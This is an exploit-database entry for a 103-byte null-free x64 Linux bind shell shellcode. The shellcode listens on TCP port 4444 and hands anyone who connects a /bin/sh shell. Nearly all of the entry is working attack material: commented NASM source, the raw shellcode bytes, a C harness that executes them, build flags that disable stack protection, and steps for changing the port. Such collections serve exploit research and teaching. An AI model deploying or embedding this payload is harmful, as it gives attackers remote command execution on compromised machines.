Linux/x64 - Bind (4444/TCP) Shell (/bin/sh) + Null-Free Shellcode (103 bytes)

Author: Scorpion_
type: 
platform: linux_x86-64
port: 103.0
date_added: 2016-01-01 
date_updated: 2017-07-04 
verified: 1 
codes:  
tags: 
aliases:  
screenshot_url: http://www.exploit-db.com/screenshots/idlt39500/captura-de-pantalla-de-2016-02-14-165116.png 
application_url: 

/*---------------------------------------------------------------------------------------------------------------------
 * /*
* Author:           Scorpion
* Copyright:        (c) 2016 iQube. (http://iQube.io)
* Release Date:     January 1, 2016
*
* Description:      x64 Linux null-free TCP bind port shellcode
* Assembled Size:   103 bytes
* Tested On:        Ubuntu 14.04 LTS
*
* Build/Run:        gcc -fno-stack-protector -z execstack bindshell.c -o bindshell
*                   ./bindshell
*                   nc localhost 4444
*
*/

/*
* NOTE: This C code binds on port 4444
* The end of this file contains the .nasm source code
* The Port can be Reconfigured According to your needs
* Instructions for changing port number
* Port obtainer change the port value accorddingly
*  					port.py
*          				import socket
*		   				port = 444
*          				hex(socket.htons(port))
*  					python port.py
*  					Result : 0x5c11
* Replace the obtained value in the shellcode to change the port number
* For building the from .nasm source use
* 					nasm -felf64 filename.nasm -o filename.o
* 					ld filename.o -o filename
* To inspect for nulls
* 					objdump -M intel -D filename.o


global _start

_start:

	; sock = socket(AF_INET, SOCK_STREAM, 0)
	; AF_INET = 2
	; SOCK_STREAM = 1
	; syscall number 41

	xor rax, rax    ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases
	xor rsi, rsi
	mul rsi
	push byte 0x2   ;pusing argument to the stack
	pop rdi         ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO
	inc esi         ; already rsi is 0 so incrementing the rsi register will make it 1
	push byte 0x29  ; pushing the syscall number into the rax by using stack
	pop rax
	syscall

	; copying the socket descripter from rax to rdi register so that we can use it further

	xchg rax, rdi

	; server.sin_family = AF_INET
	; server.sin_port = htons(PORT)
	; server.sin_addr.s_addr = INADDR_ANY
	; bzero(&server.sin_zero, 8)
	; setting up the data sctructure

	push 0x2			             ;AF_INET value is 2 so we are pushing 0x2
    mov word [rsp + 2],0x5c11        ;port 4444 htons hex value is 0x5c11 port values can be be obtained by following above instructions
    push rsp                         ; saving the complete argument to rsi register
    pop rsi


	; bind(sock, (struct sockaddr *)&server, sockaddr_len)
	; syscall number 49

	push rdx          				; Inserting the null to the stack
	push byte 0x10
	pop rdx							; value of the rdx register is set to 16 size sockaddr
	push byte 0x31
	pop rax							; rax register is set with 49 syscall for bind
	syscall

	;listen the sockets for the incomming connections
	; listen(sock, MAX_CLIENTS)
	; syscall number 50

	pop rsi
	push 0x32
	pop rax                          ; rax register is set to 50 syscall for listen
	syscall

	; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
 	;syscall number 43

 	push 0x2b
	pop rax                           ; rax register is set to 43 syscall for accept
 	syscall

 	; storing the client socket description
	mov r9, rax

	; close parent
	push 0x3
	pop rax                            ; closing the parent socket connection using close parent rax is set to 3 syscall to close parent
	syscall

	xchg rdi , r9
	xor rsi , rsi

	; initilization of dup2
	push 0x3
	pop rsi								; setting argument to 3



duplicate:
    dec esi
    mov al, 0x21                       ;duplicate syscall applied to error,output and input using loop
    syscall
    jne duplicate


execve:                                      ; Execve format  , execve("/bin/sh", 0 , 0)
     xor rsi , rsi
     mul rsi                                 ; zeroed rax , rdx register
     push ax                                 ; terminate string with null
     mov rbx , 0x68732f2f6e69622f            ; "/bin//sh"  in reverse order
     push rbx
     push rsp
     pop rdi                                 ; set RDI
     push byte 0x3b                          ; execve syscall number (59)
     pop rax
     syscall


*/

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02"
//Port number this value can be obtained from the above instructions
"\x11\x5c"
"\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x49\x89\xc1\x6a\x03\x58\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05";



main()
{

	printf("Shellcode Length:  %d\n", (int)strlen(code));

	int (*ret)() = (int(*)())code;

	ret();

}